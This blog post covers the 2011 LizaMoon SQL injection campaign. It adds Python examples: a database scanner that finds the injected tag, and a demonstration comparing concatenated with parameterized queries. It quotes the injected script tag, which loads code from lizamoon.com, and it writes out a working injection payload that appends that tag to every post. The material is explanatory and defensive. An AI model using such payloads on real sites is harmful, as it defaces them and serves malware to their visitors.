The Big Lizamoon SQL Injection Attack – March-April 2011



So – Friday things started getting interesting on the technology news sites. Most sites were running fake April Fools stories, and a few, Websense among them, were running with a large attack going on against many SQL-backed websites. Details were fragmentary. People were told to look for ur.php files in their web directory (which is not exactly a good test of whether your site has been hit by this SQL injection, since the payload is written into database rows, not into files on disk). "<script src=http://lizamoon.com/ur.php></script>" is an example of the code that gets inserted into the SQL databases, and what it actually does is force visitors to a scareware site, where malware claiming they have a virus can be installed on their computer.... (how many of those have we seen in the last 5-10 years?)
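Since the injected tag lives in database rows rather than in files, a more useful check than looking for ur.php on disk is to scan every text column of the database for the tag. The following is an added example, not code from the post or from Websense; it uses Python with the standard sqlite3 module as a stand-in for the MS SQL backends the post describes (on MS SQL you would walk the catalog views instead of sqlite_master), and the blog tables and their rows are constructed for the demonstration.

```python
import re
import sqlite3

# Loose match for the injected tag the post quotes (<script src=http://lizamoon.com/ur.php>);
# tolerant of quoting and whitespace, since reports of the exact form varied.
INJECTED_TAG = re.compile(
    r"<script\s+src\s*=\s*[\"']?\s*https?://lizamoon\.com/ur\.php", re.IGNORECASE)


def text_columns(conn):
    """Yield (table, column) for every text-typed column in the database.

    sqlite_master and PRAGMA table_info play the role the sysobjects / syscolumns
    catalog views would on MS SQL (assumption: adapt this to your own backend).
    """
    tables = [row[0] for row in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for _cid, name, col_type, _notnull, _default, _pk in conn.execute(
                f'PRAGMA table_info("{table}")'):
            if any(kind in col_type.upper() for kind in ("CHAR", "TEXT", "CLOB")):
                yield table, name


def find_injected_rows(conn):
    """Return [(table, column, rowid), ...] for every cell containing the injected tag."""
    hits = []
    for table, column in text_columns(conn):
        for rowid, value in conn.execute(f'SELECT rowid, "{column}" FROM "{table}"'):
            if isinstance(value, str) and INJECTED_TAG.search(value):
                hits.append((table, column, rowid))
    return hits


def build_sample_db():
    """Constructed sample data: a clean post, an injected post and an injected comment."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE posts (id INTEGER PRIMARY KEY, title VARCHAR(200), body TEXT);
        CREATE TABLE comments (id INTEGER PRIMARY KEY, post_id INTEGER,
                               author VARCHAR(80), body TEXT);
    """)
    conn.executemany("INSERT INTO posts (title, body) VALUES (?, ?)", [
        ("Hello world", "First post on the new blog engine."),
        ("Weekend update",
         "Nothing much happened.</title><script src=http://lizamoon.com/ur.php></script>"),
    ])
    conn.executemany("INSERT INTO comments (post_id, author, body) VALUES (?, ?, ?)", [
        (1, "alice", "Nice post!"),
        (1, "bob", '<script src="http://lizamoon.com/ur.php"></script>'),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    for table, column, rowid in find_injected_rows(build_sample_db()):
        print(f"injected tag found in {table}.{column} rowid={rowid}")
```

The scan deliberately covers every text column rather than just the obvious "body" fields, because a mass injection that walks the catalog will write into titles, author names and anything else wide enough to hold the tag.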

One of my annoyances with tech news coverage (especially virus news) is that once a story gets big enough to be covered by the major media, they never do it justice. I want information. What is the attack? Which programs are vulnerable? Is there a pattern?


This is one of the things that annoyed me about the coverage of this particular beastie.... okay, fine, it's an SQL injection, but is it MySQL? MS SQL? Some other blend? Is it attacking WordPress or Drupal or Movable Type or what? Not much detail was to be found. There were outrageous claims of 4 million sites infected (which is wildly inflated). The best estimate I've seen is in the 200,000+ range. Google searches showed millions of pages with the suspect text, although that included multiple pages per site and many sites that were simply reporting on the exploit.

So.... Saturday I was asked about it and I hadn't been able to do much research. So I did a bit of research and found that it seems nearly every affected site that Websense had identified was running on a Microsoft SQL backend. At that point I breathed a bit easier, since it meant I wouldn't be urgently upgrading 50 or so MySQL-based blog engines. In fact, after reading a bit further I essentially filed it for the weekend, as I have nothing deployed that depends on MS SQL.

So, today I was thinking that there must be some pattern to what is vulnerable.... Looking at the Google search that shows the infected blurb of code....

I see .cfm pages, .asp pages and .aspx pages. I found one site with this in its "powered by" line:

Mango Blog, a ColdFusion blog engine

I see several other sites that seem to be database driven, but it's unclear what site design engine I'm looking at. Really the common denominator is ASP/ColdFusion and Microsoft's framework for web applications.

The best advice given is that you should always filter/sanitize input before it reaches the database. In other words, don't trust your site visitors to put good things in forms. Expect them to try to break through to the database underneath by using characters (quotes, semicolons, comment markers) that tell your database it's time to run a command instead of treating the input as text.

There is a good asp.net article on Preventing SQL injection.

It really is reminiscent of this great cartoon…. about little Bobby Tables….

That said.... it seems that the better advice is to parameterize your SQL calls....

Good tutorial site on avoiding sql injection problems
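As an added example (not code from the post, nor from the ASP.NET article or tutorial it links), here is the same comment-form INSERT written both ways: the vulnerable string-concatenation version beside the parameterized one, with a payload of the kind this attack used appended to every post. Python's standard sqlite3 module stands in for the MS SQL/ASP stack the post discusses, and the table names, form input and payload are constructed for the demonstration.

```python
import sqlite3

# Attacker-controlled form input (constructed). Inside the single-quoted string of the
# vulnerable INSERT it closes the literal, ends the statement, and appends an UPDATE that
# tacks the script tag onto every post. The trailing WHERE is arranged so that the
# template's own closing quote and parenthesis complete it as valid SQL, with no need
# for a comment marker. (|| is SQLite string concatenation; T-SQL would use +.)
PAYLOAD = ("x'); UPDATE posts SET body = body || "
           "'<script src=http://lizamoon.com/ur.php></script>' WHERE ('a' = 'a")


def make_db():
    """Constructed sample schema: posts to be defaced plus a comments table behind a form."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE posts (id INTEGER PRIMARY KEY, body TEXT);
        CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT, body TEXT);
        INSERT INTO posts (body) VALUES ('Legitimate post content');
    """)
    return conn


def insert_comment_concat(conn, author, body):
    """Vulnerable: the statement is built by pasting user input into the SQL text.

    executescript() is used because it runs a batch of statements, as SQL Server does
    for a batch sent from an ASP or ColdFusion page; sqlite3's execute() would refuse
    the second statement, which is a property of this driver, not a defence.
    """
    sql = "INSERT INTO comments (author, body) VALUES ('%s', '%s')" % (author, body)
    conn.executescript(sql)


def insert_comment_param(conn, author, body):
    """Safe: the SQL text is fixed and the values travel separately as parameters,
    so the payload is stored as an ordinary string and never parsed as SQL."""
    conn.execute("INSERT INTO comments (author, body) VALUES (?, ?)", (author, body))
    conn.commit()


def post_bodies(conn):
    return [row[0] for row in conn.execute("SELECT body FROM posts ORDER BY id")]


def comment_bodies(conn):
    return [row[0] for row in conn.execute("SELECT body FROM comments ORDER BY id")]


if __name__ == "__main__":
    vulnerable = make_db()
    insert_comment_concat(vulnerable, "mallory", PAYLOAD)
    print("concatenated SQL -> posts now read:", post_bodies(vulnerable))

    hardened = make_db()
    insert_comment_param(hardened, "mallory", PAYLOAD)
    print("parameterized SQL -> posts still read:", post_bodies(hardened))
    print("and the payload sits harmlessly in a comment:", comment_bodies(hardened))
```

Note that the parameterized version does not filter anything out: the hostile string is stored exactly as typed, which is what you want for a comment field. The protection comes from the query text never being assembled from user input, so there is no character the attacker can send that changes its structure. Output encoding on the way back out (to HTML) is a separate job.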

I suspect there are many hundreds of site owners that still aren’t aware that they were compromised.

So here's the flamebait: are poor SQL coding practices a common trait in the Microsoft toolkit environment?

I doubt it's just an MS toolkit issue, although the proliferation of "easily make your own database-driven site" toolkits would seem to encourage sloppy design. (Yes – I know... open source based blog engines have had their share of SQL injection issues too....)

Making it easy for anyone to build a database-driven website does not mean everyone will follow best practices for validating input. (In fact, in most things I've seen, making things easier seems to encourage cutting corners...)
